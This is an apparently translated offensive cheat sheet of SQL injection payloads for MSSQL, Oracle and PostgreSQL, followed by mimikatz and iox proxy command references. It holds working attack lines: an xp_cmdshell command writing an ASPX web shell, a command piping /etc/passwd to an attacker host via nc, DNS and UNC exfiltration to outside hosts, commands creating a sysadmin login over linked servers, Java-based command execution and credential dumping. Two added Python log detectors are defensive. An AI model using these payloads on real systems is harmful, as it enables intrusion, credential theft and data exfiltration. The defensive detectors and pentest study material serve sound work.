exec master..xp_cmdshell 'echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["pass"],"unsafe");%^> > c:\\WWW\\test.aspx'
MSSQL default databases
| Name | Description |
|---|---|
| pubs | Not available in MSSQL 2005 |
| model | Available in all versions |
| msdb | Available in all versions |
| tempdb | Available in all versions |
| northwind | Available in all versions |
| information_schema | Available from MSSQL 2000 onwards |
MSSQL comments
| Type | Description |
|---|---|
| /* MSSQL Comment */ | C-style comment |
| -- - | SQL comment |
| ;%00 | Null byte |
MSSQL users
SELECT CURRENT_USER
SELECT user_name();
SELECT system_user;
SELECT user;
MSSQL version
SELECT @@version
MSSQL host name
SELECT HOST_NAME()
SELECT @@hostname
SELECT @@SERVERNAME
SELECT SERVERPROPERTY('productversion')
SELECT SERVERPROPERTY('productlevel')
SELECT SERVERPROPERTY('edition');
MSSQL database name
SELECT DB_NAME()
MSSQL database credentials
- MSSQL 2000: Hashcat mode 131:
0x01002702560500000000000000000000000000000000000000008db43dd9b1972a636ad0c7d4b8c515cb8ce46578
SELECT name, password FROM master..sysxlogins
SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins -- Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer
- MSSQL 2005: Hashcat mode 132:
0x010018102152f8f28c8499d8ef263c53f8be369d799f931b2fbe
SELECT name, password_hash FROM master.sys.sql_logins
SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins
MSSQL: list databases
SELECT name FROM master..sysdatabases;
SELECT DB_NAME(N); -- for N = 0, 1, 2, ...
SELECT STRING_AGG(name, ', ') FROM master..sysdatabases; -- Change the delimiter value ', ' to anything else you want => master, tempdb, model, msdb (Only works in MSSQL 2017+)
MSSQL: list columns
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'mytable'); -- for the current DB only
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable'; -- list column names and types for master..sometable
SELECT table_catalog, column_name FROM information_schema.columns
MSSQL: list tables
SELECT name FROM master..sysobjects WHERE xtype = 'U'; -- use xtype = 'V' for views
SELECT name FROM someotherdb..sysobjects WHERE xtype = 'U';
SELECT table_catalog, table_name FROM information_schema.columns
SELECT STRING_AGG(name, ', ') FROM master..sysobjects WHERE xtype = 'U'; -- Change the delimiter value ', ' to anything else you want => trace_xe_action_map, trace_xe_event_map, spt_fallback_db, spt_fallback_dev, spt_fallback_usg, spt_monitor, MSreplication_options (Only works in MSSQL 2017+)
MSSQL union-based injection
-- extract database names
$ SELECT name FROM master..sysdatabases
[*] Injection
[*] msdb
[*] tempdb
-- extract the tables of the Injection database
$ SELECT name FROM Injection..sysobjects WHERE xtype = 'U'
[*] Profiles
[*] Roles
[*] Users
-- extract the columns of the Users table
$ SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'Users')
[*] UserId
[*] UserName
-- finally extract the data
$ SELECT UserId, UserName from Users
MSSQL error-based injection
For integer inputs: convert(int,@@version)
For integer inputs: cast((SELECT @@version) as int)
For string inputs: ' + convert(int,@@version) + '
For string inputs: ' + cast((SELECT @@version) as int) + '
MSSQL blind injection
AND LEN((SELECT TOP 1 username FROM tblusers))=5 ; -- -
AND ASCII(SUBSTRING((SELECT TOP 1 username FROM tblusers),1,1))=97
AND UNICODE(SUBSTRING((SELECT 'A'),1,1))>64--
AND (SELECT TOP 1 SUBSTRING(table_name,1,1) FROM information_schema.tables) > 'A'
AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>90
SELECT @@version WHERE @@version LIKE '%12.0.2000.8%'
WITH data AS (SELECT (ROW_NUMBER() OVER (ORDER BY message)) as row,* FROM log_table)
SELECT message FROM data WHERE row = 1 and message like 't%'
MSSQL time-based injection
ProductID=1;waitfor delay '0:0:10'--
ProductID=1);waitfor delay '0:0:10'--
ProductID=1';waitfor delay '0:0:10'--
ProductID=1');waitfor delay '0:0:10'--
ProductID=1));waitfor delay '0:0:10'--
IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'
IF 1=1 WAITFOR DELAY '0:0:5' ELSE WAITFOR DELAY '0:0:0';
MSSQL stacked queries
- Without any statement terminator
-- multiple SELECT statements
SELECT 'A'SELECT 'B'SELECT 'C'
-- updating password with a stacked query
SELECT id, username, password FROM users WHERE username = 'admin'exec('update[users]set[password]=''a''')--
-- using the stacked query to enable xp_cmdshell
-- you won't have the output of the query, redirect it to a file
SELECT id, username, password FROM users WHERE username = 'admin'exec('sp_configure''show advanced option'',''1''reconfigure')exec('sp_configure''xp_cmdshell'',''1''reconfigure')--
- Use a semicolon ";" to add another query
ProductID=1; DROP members--
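The time-based and stacked-query payloads above share a few tells that survive obfuscation: WAITFOR DELAY, sp_configure turning on xp_cmdshell, EXEC( glued onto a string literal without a terminator, keywords split by /**/ comments, and doubled quotes inside EXECUTE('...'). The detector below is an added example, not from the original cheat sheet, written for a defender triaging web-server logs or SQL audit text: it normalises a statement (URL-decodes when asked, removes both comment styles, collapses the doubled quotes, squeezes whitespace) and then applies a small indicator set. The indicator names and the sample statements are constructed for this example; the patterns cover the payload shapes shown on this page, not every variant.

```python
import re
from urllib.parse import unquote_plus

# Indicators applied to the normalised statement (comments removed, doubled quotes
# collapsed, whitespace squeezed, lower-cased). Names are constructed for this example.
PATTERNS = {
    "xp_cmdshell": re.compile(r"\bxp_cmdshell\b"),
    "enable_xp_cmdshell": re.compile(r"sp_configure\s*'xp_cmdshell'\s*,\s*'?1"),
    "advanced_options": re.compile(r"sp_configure\s*'show advanced options?'\s*,\s*'?1"),
    "time_delay": re.compile(r"\bwaitfor\s+delay\b"),
    "stacked_exec": re.compile(r"\bexec(?:ute)?\s*\("),
}


def normalize_tsql(text: str, url_encoded: bool = False) -> str:
    """Undo the obfuscations used by the payloads above before pattern matching."""
    if url_encoded:
        text = unquote_plus(text)                 # web-log form: %27, %3B, '+' for space
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.S)  # /**/ also glues split keywords
    text = re.sub(r"--[^\r\n]*", " ", text)       # -- comments, including the '-- -' form
    text = text.replace("''", "'")                # nested EXECUTE('...') doubles every quote
    return re.sub(r"\s+", " ", text).strip().lower()


def classify_tsql(text: str, url_encoded: bool = False) -> list:
    """Return the sorted indicator names that match the statement (empty list = clean)."""
    norm = normalize_tsql(text, url_encoded)
    return sorted(name for name, pattern in PATTERNS.items() if pattern.search(norm))


# Constructed samples: (label, statement as captured, whether it is URL-encoded).
SAMPLES = [
    ("stacked_enable",
     "SELECT id, username, password FROM users WHERE username = 'admin'"
     "exec('sp_configure''show advanced option'',''1''reconfigure')"
     "exec('sp_configure''xp_cmdshell'',''1''reconfigure')--", False),
    ("time_based_encoded", "ProductID=1%27%3Bwaitfor+delay+%270%3A0%3A10%27--", True),
    ("linked_server", "EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;') AT LinkedServer", False),
    ("split_keyword", "EXEC master..xp_/**/cmdshell 'whoami'", False),
    ("benign", "SELECT name FROM master..sysdatabases WHERE name <> 'tempdb'", False),
]


def classify_samples() -> dict:
    return {label: classify_tsql(text, enc) for label, text, enc in SAMPLES}


if __name__ == "__main__":
    for label, tags in classify_samples().items():
        print(f"{label:<20} {tags or 'clean'}")
```

Feed it the query-string portion of access-log lines (url_encoded=True) or the statement text from SQL Server audit or Extended Events output (url_encoded=False); the "stacked_exec" indicator on its own is noisy on legitimate dynamic SQL, so alert on the combination with enable_xp_cmdshell or time_delay first.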
MSSQL: read files
Permissions: the BULK option requires the ADMINISTER BULK OPERATIONS or the ADMINISTER DATABASE BULK OPERATIONS permission.
-1 union select null,(select x from OpenRowset(BULK 'C:\Windows\win.ini',SINGLE_CLOB) R(x)),null,null
MSSQL: command execution
EXEC xp_cmdshell "net user";
EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:';
EXEC master.dbo.xp_cmdshell 'ping 127.0.0.1';
Re-enable xp_cmdshell (disabled by default since SQL Server 2005)
EXEC sp_configure 'show advanced options',1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1;
RECONFIGURE;
Interacting with an MSSQL instance.
sqsh -S 192.168.1.X -U sa -P superPassword
python mssqlclient.py WORKGROUP/Administrator:password@192.168.1X -port 46758
Running Python scripts
Runs as a different user than the one xp_cmdshell executes commands as
-- Print the user being used (and execute commands)
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("getpass").getuser())'
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("whoami"))'
-- Open and read a file
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(open("C:\\inetpub\\wwwroot\\web.config", "r").read())'
-- Multiline
EXECUTE sp_execute_external_script @language = N'Python', @script = N'
import sys
print(sys.version)
'
GO
MSSQL data exfiltration
MSSQL DNS exfiltration
Technique from https://twitter.com/ptswarm/status/1313476695295512578/photo/1
-- Permissions: requires the VIEW SERVER STATE permission on the server.
1 and exists(select * from fn_xe_file_target_read_file('C:\*.xel','\\'%2b(select pass from users where id=1)%2b'.xxxx.burpcollaborator.net\1.xem',null,null))
-- Permissions: requires the CONTROL SERVER permission.
1 (select 1 where exists(select * from fn_get_audit_file('\\'%2b(select pass from users where id=1)%2b'.xxxx.burpcollaborator.net\',default,default)))
1 and exists(select * from fn_trace_gettable('\\'%2b(select pass from users where id=1)%2b'.xxxx.burpcollaborator.net\1.trc',default))
MSSQL UNC paths
MSSQL supports stacked queries, so we can create a variable pointing to our IP address and then use the xp_dirtree function to list the files in our SMB share and grab the NTLMv2 hash.
1'; use master; exec xp_dirtree '\\10.10.15.XX\SHARE';--
xp_dirtree '\\attackerip\file'
xp_fileexist '\\attackerip\file'
BACKUP LOG [TESTING] TO DISK = '\\attackerip\file'
BACKUP DATABASE [TESTING] TO DISK = '\\attackerip\file'
RESTORE LOG [TESTING] FROM DISK = '\\attackerip\file'
RESTORE DATABASE [TESTING] FROM DISK = '\\attackerip\file'
RESTORE HEADERONLY FROM DISK = '\\attackerip\file'
RESTORE FILELISTONLY FROM DISK = '\\attackerip\file'
RESTORE LABELONLY FROM DISK = '\\attackerip\file'
RESTORE REWINDONLY FROM DISK = '\\attackerip\file'
RESTORE VERIFYONLY FROM DISK = '\\attackerip\file'
MSSQL: escalate to sysadmin
EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin';
MSSQL trusted links
The links between databases work even across forest trusts.
msf> use exploit/windows/mssql/mssql_linkcrawler
[msf> set DEPLOY true] #Set DEPLOY to true if you want to abuse the privileges to obtain a meterpreter session
Manual exploitation
-- find link
select * from master..sysservers
-- execute query through the link
select * from openquery("dcorp-sql1", 'select * from master..sysservers')
select version from openquery("linkedserver", 'select @@version as version');
-- chain multiple openquery
select version from openquery("link1",'select version from openquery("link2","select @@version as version")')
-- execute shell commands
EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;') AT LinkedServer
select 1 from openquery("linkedserver",'select 1;exec master..xp_cmdshell "dir c:"')
-- create user and give admin privileges
EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
List permissions
List the current user's effective permissions on the server.
SELECT * FROM fn_my_permissions(NULL, 'SERVER');
List the current user's effective permissions on the database.
SELECT * FROM fn_my_permissions (NULL, 'DATABASE');
List the current user's effective permissions on a view.
SELECT * FROM fn_my_permissions('Sales.vIndividualCustomer', 'OBJECT') ORDER BY subentity_name, permission_name;
Check whether the current user belongs to a given server role.
-- possible roles: sysadmin, serveradmin, dbcreator, setupadmin, bulkadmin, securityadmin, diskadmin, public, processadmin
SELECT is_srvrolemember('sysadmin');
Using SP_PASSWORD in a query
Hides the statement text from the logs, e.g.: ' AND 1=1--sp_password
MSSQL OPSEC
-- 'sp_password' was found in the text of this event.
-- The text has been replaced with this comment for security reasons.
References
Note: most of this content is translated from https://github.com/swisskyrepo/PayloadsAllTheThings
- MSSQL penetration testing
- Pentest Monkey – mssql-sql-injection-cheat-sheet
- Error Based – SQL Injection
- MSSQL Trusted Links – HackTricks.xyz
- SQL Server – Link… Link… Link… and Shell: How to Hack Database Links in SQL Server! – Antti Rantasaari – June 6th, 2013
- DAFT: Database Audit Framework & Toolkit – NetSPI
- SQL Server UNC Path Injection Cheatsheet – nullbind
- Full MSSQL Injection PWNage – ZeQ3uL && JabAv0C – 28 January 2009
- Microsoft – sys.fn_my_permissions (Transact-SQL)
- Microsoft – IS_SRVROLEMEMBER (Transact-SQL)
- AWS WAF Clients Left Vulnerable to SQL Injection Due to Unorthodox MSSQL Design Choice – Marc Olivier Bergeron – Jun 21, 2023
oracle
Related tools:
Oracle: find the largest tables
select t.table_name,t.tablespace_name,t.owner,t.num_rows from all_tables t ORDER BY NUM_ROWS DESC;
select t.table_name tableName, f.comments comments
from user_tables t
inner join user_tab_comments f
on t.table_name = f.table_name;
Find which schema and table contain a "user" column
SELECT
    owner AS database_name,
    table_name,
    column_name
FROM
    all_tab_columns
WHERE
    column_name LIKE '%USER%'
ORDER BY
    owner, table_name, column_name;
Oracle SQL default databases
| Name | Description |
|---|---|
| SYSTEM | Available in all versions |
| SYSAUX | Available in all versions |
Oracle SQL comments
| Type | Description |
|---|---|
| -- - | SQL comment |
Oracle SQL version
SELECT user FROM dual UNION SELECT * FROM v$version
SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';
SELECT banner FROM v$version WHERE banner LIKE 'TNS%';
SELECT version FROM v$instance;
Oracle SQL host name
SELECT host_name FROM v$instance; (Privileged)
SELECT UTL_INADDR.get_host_name FROM dual;
SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual;
SELECT UTL_INADDR.get_host_address FROM dual;
Oracle SQL database name
SELECT global_name FROM global_name;
SELECT name FROM V$DATABASE;
SELECT instance_name FROM V$INSTANCE;
SELECT SYS.DATABASE_NAME FROM DUAL;
Oracle SQL database credentials
| SQL statement | Description |
|---|---|
| SELECT username FROM all_users; | Available in all versions |
| SELECT name, password from sys.user$; | Privileged, <= 10g |
| SELECT name, spare4 from sys.user$; | Privileged, <= 11g |
Oracle SQL: list databases
SELECT DISTINCT owner FROM all_tables;
Oracle SQL: list columns
SELECT column_name FROM all_tab_columns WHERE table_name = 'blah';
SELECT column_name FROM all_tab_columns WHERE table_name = 'blah' and owner = 'foo';
Oracle SQL: list tables
SELECT table_name FROM all_tables;
SELECT owner, table_name FROM all_tables;
SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%';
Oracle SQL error-based injection
| Description | Query |
|---|---|
| Invalid HTTP Request | SELECT utl_inaddr.get_host_name((select banner from v$version where rownum=1)) FROM dual |
| CTXSYS.DRITHSX.SN | SELECT CTXSYS.DRITHSX.SN(user,(select banner from v$version where rownum=1)) FROM dual |
| Invalid XPath | SELECT ordsys.ord_dicom.getmappingxpath((select banner from v$version where rownum=1),user,user) FROM dual |
| Invalid XML | SELECT to_char(dbms_xmlgen.getxml('select "'||(select user from sys.dual)||'" FROM sys.dual')) FROM dual |
| Invalid XML | SELECT rtrim(extract(xmlagg(xmlelement("s", username || ',')),'/s').getstringval(),',') FROM all_users |
| SQL Error | SELECT NVL(CAST(LENGTH(USERNAME) AS VARCHAR(4000)),CHR(32)) FROM (SELECT USERNAME,ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1 |
| XDBURITYPE getblob | XDBURITYPE((SELECT banner FROM v$version WHERE banner LIKE 'Oracle%')).getblob() |
| XDBURITYPE getclob | XDBURITYPE((SELECT table_name FROM (SELECT ROWNUM r,table_name FROM all_tables ORDER BY table_name) WHERE r=1)).getclob() |
When the injection point is inside a string use: '||PAYLOAD--
Oracle SQL blind injection
| Description | Query |
|---|---|
| Version is 12.2 | SELECT COUNT(*) FROM v$version WHERE banner LIKE 'Oracle%12.2%'; |
| Subselect is enabled | SELECT 1 FROM dual WHERE 1=(SELECT 1 FROM dual) |
| Table log_table exists | SELECT 1 FROM dual WHERE 1=(SELECT 1 from log_table); |
| Column message exists in table log_table | SELECT COUNT(*) FROM user_tab_cols WHERE column_name = 'MESSAGE' AND table_name = 'LOG_TABLE'; |
| First letter of first message is t | SELECT message FROM log_table WHERE rownum=1 AND message LIKE 't%'; |
Oracle SQL time-based injection
AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])
Oracle SQL command execution
Oracle Java execution
- List Java privileges
select * from dba_java_policy
select * from user_java_policy
- Grant privileges
exec dbms_java.grant_permission('SCOTT', 'SYS:java.io.FilePermission','<<ALL FILES>>','execute');
exec dbms_java.grant_permission('SCOTT','SYS:java.lang.RuntimePermission', 'writeFileDescriptor', '');
exec dbms_java.grant_permission('SCOTT','SYS:java.lang.RuntimePermission', 'readFileDescriptor', '');
- Execute commands
- 10g R2, 11g R1 and R2:
DBMS_JAVA_TEST.FUNCALL()
SELECT DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','c:\\windows\\system32\\cmd.exe','/c', 'dir >c:\test.txt') FROM DUAL
SELECT DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','/bin/bash','-c','/bin/ls>/tmp/OUT2.LST') from dual
- 11g R1 and R2:
DBMS_JAVA.RUNJAVA()
SELECT DBMS_JAVA.RUNJAVA('oracle/aurora/util/Wrapper /bin/bash -c /bin/ls>/tmp/OUT.LST') FROM DUAL
- 10g R2, 11g R1 and R2:
Oracle Java class
/* create Java class */
BEGIN
EXECUTE IMMEDIATE 'create or replace and compile java source named "PwnUtil" as import java.io.*; public class PwnUtil{ public static String runCmd(String args){ try{ BufferedReader myReader = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(args).getInputStream()));String stemp, str = "";while ((stemp = myReader.readLine()) != null) str += stemp + "\n";myReader.close();return str;} catch (Exception e){ return e.toString();}} public static String readFile(String filename){ try{ BufferedReader myReader = new BufferedReader(new FileReader(filename));String stemp, str = "";while((stemp = myReader.readLine()) != null) str += stemp + "\n";myReader.close();return str;} catch (Exception e){ return e.toString();}}};';
END;
/
BEGIN
EXECUTE IMMEDIATE 'create or replace function PwnUtilFunc(p_cmd in varchar2) return varchar2 as language java name ''PwnUtil.runCmd(java.lang.String) return String'';';
END;
/
/* run OS command */
SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual;
or (hex encoded)
/* create Java class */
SELECT TO_CHAR(dbms_xmlquery.getxml('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate utl_raw.cast_to_varchar2(hextoraw(''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''));
EXECUTE IMMEDIATE utl_raw.cast_to_varchar2(hextoraw(''637265617465206f72207265706c6163652066756e6374696f6e2050776e5574696c46756e6328705f636d6420696e207661726368617232292072657475726e207661726368617232206173206c616e6775616765206a617661206e616d65202770776e7574696c2e72756e286a6176612e6c616e672e537472696e67292072657475726e20537472696e67273b'')); end;')) results FROM dual
/* run OS command */
SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual;
References
Note: most of this content is translated from https://github.com/swisskyrepo/PayloadsAllTheThings
- NetSpi – SQL Wiki
- ASDC12 – New and Improved Hacking Oracle From Web – OWASP
- Pentesting Oracle TNS Listener – HackTricks
- ODAT: Oracle Database Attacking Tool – quentinhardy
- WebSec CheatSheet – Oracle
- New payload to exploit Error-based SQL injection – Oracle database – Mannu Linux – 12/09/2023
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md
postgresql
PostgreSQL 命令执行
CVE-2019–9193
DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;
Using libc.so.6
CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;
SELECT system('cat /etc/passwd | nc <attacker IP> <attacker port>');
PostgreSQL comments
--
/**/
PostgreSQL statement-chaining characters for injection points
; # Terminates an SQL command. The only place it can appear inside a statement is within a string constant or quoted identifier.
|| # "or" statement; in PostgreSQL this is the string concatenation operator
# Usage examples:
/?whatever=1;(select 1 from pg_sleep(5))
/?whatever=1||(select 1 from pg_sleep(5))
PostgreSQL version
SELECT version()
PostgreSQL current user
SELECT user;
SELECT current_user;
SELECT session_user;
SELECT usename FROM pg_user;
SELECT getpgusername();
PostgreSQL user list
SELECT usename FROM pg_user
PostgreSQL password hash list
SELECT usename, passwd FROM pg_shadow
List database superuser (administrator) accounts
SELECT usename FROM pg_user WHERE usesuper IS TRUE
PostgreSQL privilege list
SELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user
Check whether the current user is a superuser
SHOW is_superuser;
SELECT current_setting('is_superuser');
SELECT usesuper FROM pg_user WHERE usename = CURRENT_USER;
PostgreSQL database name
SELECT current_database()
PostgreSQL database list
SELECT datname FROM pg_database
PostgreSQL table list
SELECT table_name FROM information_schema.tables
PostgreSQL column list
SELECT column_name FROM information_schema.columns WHERE table_name='data_table'
PostgreSQL error-based injection
,cAsT(chr(126)||vErSiOn()||chr(126)+aS+nUmeRiC)
,cAsT(chr(126)||(sEleCt+table_name+fRoM+information_schema.tables+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
,cAsT(chr(126)||(sEleCt+column_name+fRoM+information_schema.columns+wHerE+table_name='data_table'+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
,cAsT(chr(126)||(sEleCt+data_column+fRoM+data_table+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)
' and 1=cast((SELECT concat('DATABASE: ',current_database())) as int) and '1'='1
' and 1=cast((SELECT table_name FROM information_schema.tables LIMIT 1 OFFSET data_offset) as int) and '1'='1
' and 1=cast((SELECT column_name FROM information_schema.columns WHERE table_name='data_table' LIMIT 1 OFFSET data_offset) as int) and '1'='1
' and 1=cast((SELECT data_column FROM data_table LIMIT 1 OFFSET data_offset) as int) and '1'='1
PostgreSQL XML helpers
select query_to_xml('select * from pg_user',true,true,''); -- returns the whole result set as a single XML row
select database_to_xml(true,true,''); -- dumps the current database as XML
select database_to_xmlschema(true,true,''); -- dumps the current database's XML schema
PostgreSQL boolean-based blind injection
' and substr(version(),1,10) = 'PostgreSQL' and '1' -> OK
' and substr(version(),1,10) = 'PostgreXXX' and '1' -> KO
PostgreSQL time-based blind injection
select 1 from pg_sleep(5)
;(select 1 from pg_sleep(5))
||(select 1 from pg_sleep(5))
select case when substring(datname,1,1)='1' then pg_sleep(5) else pg_sleep(0) end from pg_database limit 1
select case when substring(table_name,1,1)='a' then pg_sleep(5) else pg_sleep(0) end from information_schema.tables limit 1
select case when substring(column,1,1)='1' then pg_sleep(5) else pg_sleep(0) end from table_name limit 1
select case when substring(column,1,1)='1' then pg_sleep(5) else pg_sleep(0) end from table_name where column_name='value' limit 1
AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))
AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))
PostgreSQL stacked queries
http://host/vuln.php?id=injection';create table NotSoSecure (data varchar(200));--
PostgreSQL file read
select pg_ls_dir('./');
select pg_read_file('PG_VERSION', 0, 200);
PostgreSQL file write
CREATE TABLE pentestlab (t TEXT);
INSERT INTO pentestlab(t) VALUES('nc -lvvp 2346 -e /bin/bash');
SELECT * FROM pentestlab;
COPY pentestlab(t) TO '/tmp/pentestlab';
Filter bypass
Quotes
Using CHR
SELECT CHR(65)||CHR(66)||CHR(67);
Using dollar quoting (PostgreSQL 8 and later)
SELECT $$This is a string$$
SELECT $TAG$This is another string$TAG$
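From the defender's side, the primitives listed in the PostgreSQL command execution, file read/write, time-based and filter-bypass sections above, and the Oracle Java-source / hex-decoded EXECUTE IMMEDIATE procedure at the top of this section, all leave a recognisable statement in the database log. The following Python is an added example, not code from the original page or from PayloadsAllTheThings: it parses PostgreSQL statement-log lines (the layout produced with log_statement = 'all') and tags each statement with the rule it trips. The log lines, the `app@shop` session, the Oracle samples and the rule names are constructed for the demo; the regexes are assumptions about how those statements appear when logged verbatim on one line.

```python
import re

# Constructed sample in the PostgreSQL log_statement = 'all' layout
# (timestamp, backend pid, user@database, "LOG:  statement: <sql>").
# The statements mirror the primitives listed above; nothing here is
# captured from a real system.
SAMPLE_LOG = """\
2024-05-01 10:00:01 UTC [4123] app@shop LOG:  statement: SELECT id, name FROM products WHERE id = 42
2024-05-01 10:00:02 UTC [4123] app@shop LOG:  statement: SELECT version()
2024-05-01 10:00:03 UTC [4123] app@shop LOG:  statement: COPY cmd_exec FROM PROGRAM 'id'
2024-05-01 10:00:04 UTC [4123] app@shop LOG:  statement: CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT
2024-05-01 10:00:05 UTC [4123] app@shop LOG:  statement: select pg_read_file('PG_VERSION', 0, 200)
2024-05-01 10:00:06 UTC [4123] app@shop LOG:  statement: COPY pentestlab(t) TO '/tmp/pentestlab'
2024-05-01 10:00:07 UTC [4123] app@shop LOG:  statement: SELECT 1 FROM products WHERE id = 1;(select 1 from pg_sleep(5))
2024-05-01 10:00:08 UTC [4123] app@shop LOG:  statement: SELECT CHR(65)||CHR(66)||CHR(67)
2024-05-01 10:00:09 UTC [4123] app@shop LOG:  statement: SELECT usename, passwd FROM pg_shadow
"""

# Constructed Oracle statements of the kind shown at the top of this section.
ORACLE_SAMPLES = [
    'create or replace and compile java source named "Util" as public class Util {}',
    "execute immediate utl_raw.cast_to_varchar2(hextoraw('41'))",
]

# (rule name, pattern). Assumption: the whole statement sits on one log line.
RULES = [
    ("copy_from_program", r"\bCOPY\b.*\bFROM\s+PROGRAM\b"),
    ("copy_to_file", r"\bCOPY\b.*\bTO\s+'"),
    ("c_language_function", r"\bLANGUAGE\s+'?c'?(?=\s|;|$)"),
    ("file_access_function", r"\bpg_(read_file|read_binary_file|ls_dir)\s*\("),
    ("pg_sleep_probe", r"\bpg_sleep\s*\("),
    ("generate_series_delay", r"\bGENERATE_SERIES\s*\(\s*1\s*,\s*\d{6,}"),
    ("shadow_read", r"\bpg_shadow\b"),
    ("chr_concat_obfuscation", r"\bCHR\s*\(\s*\d+\s*\)\s*\|\|"),
    ("oracle_java_source", r"\bJAVA\s+SOURCE\s+NAMED\b|\bLANGUAGE\s+JAVA\s+NAME\b"),
    ("hex_decoded_exec", r"\bEXECUTE\s+IMMEDIATE\b.*\bHEXTORAW\s*\("),
]
COMPILED = [(name, re.compile(rx, re.IGNORECASE)) for name, rx in RULES]
STATEMENT_RE = re.compile(r"LOG:\s+statement:\s+(?P<sql>.*)$")


def parse_pg_log(text):
    """Yield (line_number, sql) for every 'LOG:  statement:' line."""
    for n, line in enumerate(text.splitlines(), start=1):
        m = STATEMENT_RE.search(line)
        if m:
            yield n, m.group("sql")


def classify(sql):
    """Return the names of every rule the statement triggers, in RULES order."""
    return [name for name, rx in COMPILED if rx.search(sql)]


def scan_log(text):
    """Return {line_number: [rule, ...]} for statements that hit at least one rule."""
    hits = {}
    for n, sql in parse_pg_log(text):
        names = classify(sql)
        if names:
            hits[n] = names
    return hits


if __name__ == "__main__":
    for n, names in scan_log(SAMPLE_LOG).items():
        print(f"line {n}: {', '.join(names)}")
    for sql in ORACLE_SAMPLES:
        print(f"oracle: {classify(sql)}")
```

Matches are leads for triage rather than verdicts: DBAs also use COPY ... TO and pg_read_file, so the rule name is meant to feed an alert that checks which role and source host issued the statement, and a statement that trips copy_from_program or c_language_function from an application role is the one worth paging on.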
Note: most of this content is translated from https://github.com/swisskyrepo/PayloadsAllTheThings
Tool command quick reference
mimikatz
Official GitHub: https://github.com/gentilkiwi/mimikatz
Dump logon credentials
mimikatz.exe log "privilege::debug" "sekurlsa::logonpasswords" exit
privilege::debug
sekurlsa::logonpasswords
Dump credentials from an lsass.exe minidump
mimikatz.exe log "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit
mimikatz pass-the-hash (PTH) to spawn cmd
mimikatz "privilege::debug" "sekurlsa::pth /user:Administrator /domain:WIN-9UUCAGH32BT /ntlm:f33dfac0370b09935d0037d8333caf25 /run:cmd.exe" "exit"
mimikatz pass-the-hash (PTH) to spawn mstsc
mimikatz "privilege::debug" "sekurlsa::pth /user:Administrator /domain:WIN-9UUCAGH32BT /ntlm:f33dfac0370b09935d0037d8333caf25 /run:mstsc.exe /restrictedadmin" "exit"
privilege::debug
sekurlsa::pth /user:Administrator /domain:WIN-9UUCAGH32BT /ntlm:f33dfac0370b09935d0037d8333caf25 "/run:mstsc.exe /restrictedadmin"
Dump credentials from the SAM database
mimikatz "log" "lsadump::sam /sam:sam.hive /system:system.hive" "exit"
Batch script to collect credentials
@echo off
cd /d D:\tools\
mimikatz.exe privilege::debug sekurlsa::logonpasswords exit > C:\windows\temp\log.txt
Dump the hashes of all domain users
mimikatz.exe "lsadump::dcsync /domain:test.com /all /csv" exit
Proxy tools
iox
Download: https://github.com/EddieIvan01/iox
proxy
Start a SOCKS5 service locally on 0.0.0.0:1080:
./iox proxy -l 1080
Encrypted forwarded SOCKS5 proxy:
Run on the VPS (forwards traffic received on port 1080 to port 50054):
nohup ./iox proxy -l 50054 -l 1081 -k 3211 > iox.log &
Run on the target host (starts the proxy service and connects back to VPS port 50054):
./iox proxy -r VPSIP:50054 -k 3211
